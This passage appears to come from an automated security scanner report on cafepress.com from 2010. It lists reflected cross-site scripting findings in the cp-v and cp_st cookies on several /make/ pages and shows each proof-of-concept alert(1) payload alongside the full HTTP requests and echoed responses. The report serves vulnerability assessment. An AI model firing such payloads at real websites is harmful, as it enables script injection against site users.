Cache-Control: private
Content-Length: 71207

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
omain_us = 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'Make'
window.cafepress.tealeaf.searchTerm = '8caa8</script><script>alert(1)</script>49b69bc8c1b'
window.cafepress.tealeaf.salesChannel = 'Make'
window.cafepress.tealeaf.trafficMedium = 'Direct'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP
...[SNIP]...

1.100. http://www.cafepress.com/make/custom-buttons [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/custom-buttons

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d08c3"-alert(1)-"5c9b7d83b0c was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /make/custom-buttons HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAd08c3"-alert(1)-"5c9b7d83b0c; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW15
Cteonnt-Length: 54737
Date: Sun, 26 Dec 2010 13:48:17 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 54737

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAd08c3"-alert(1)-"5c9b7d83b0c";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.101. http://www.cafepress.com/make/custom-buttons [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/custom-buttons

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 467e9</script><script>alert(1)</script>f97ce1fac6a was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /make/custom-buttons HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=467e9</script><script>alert(1)</script>f97ce1fac6a; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW19
Cteonnt-Length: 54759
Date: Sun, 26 Dec 2010 13:48:16 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 54759

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
omain_us = 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'Make'
window.cafepress.tealeaf.searchTerm = '467e9</script><script>alert(1)</script>f97ce1fac6a'
window.cafepress.tealeaf.salesChannel = 'Make'
window.cafepress.tealeaf.trafficMedium = 'Direct'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP
...[SNIP]...

1.102. http://www.cafepress.com/make/custom-hats [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/custom-hats

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1aa5"-alert(1)-"c0e3e257a86 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /make/custom-hats HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAb1aa5"-alert(1)-"c0e3e257a86; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW15
Cteonnt-Length: 54696
Date: Sun, 26 Dec 2010 13:48:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 54696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAb1aa5"-alert(1)-"c0e3e257a86";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.103. http://www.cafepress.com/make/custom-hats [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/custom-hats

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a30c5</script><script>alert(1)</script>e0b31c17436 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /make/custom-hats HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=a30c5</script><script>alert(1)</script>e0b31c17436; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW13
Cteonnt-Length: 54711
Date: Sun, 26 Dec 2010 13:48:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 54711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
omain_us = 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'Make'
window.cafepress.tealeaf.searchTerm = 'a30c5</script><script>alert(1)</script>e0b31c17436'
window.cafepress.tealeaf.salesChannel = 'Make'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_08
...[SNIP]...

1.104. http://www.cafepress.com/make/custom-hoodies-sweatshirts [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/custom-hoodies-sweatshirts

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5222"-alert(1)-"66934ad12b9 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /make/custom-hoodies-sweatshirts HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAb5222"-alert(1)-"66934ad12b9; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW14
Cteonnt-Length: 69614
Date: Sun, 26 Dec 2010 13:47:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 69614

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAb5222"-alert(1)-"66934ad12b9";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.105. http://www.cafepress.com/make/custom-hoodies-sweatshirts [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/custom-hoodies-sweatshirts

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b326</script><script>alert(1)</script>7b9d98d964e was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /make/custom-hoodies-sweatshirts HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=9b326</script><script>alert(1)</script>7b9d98d964e; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; 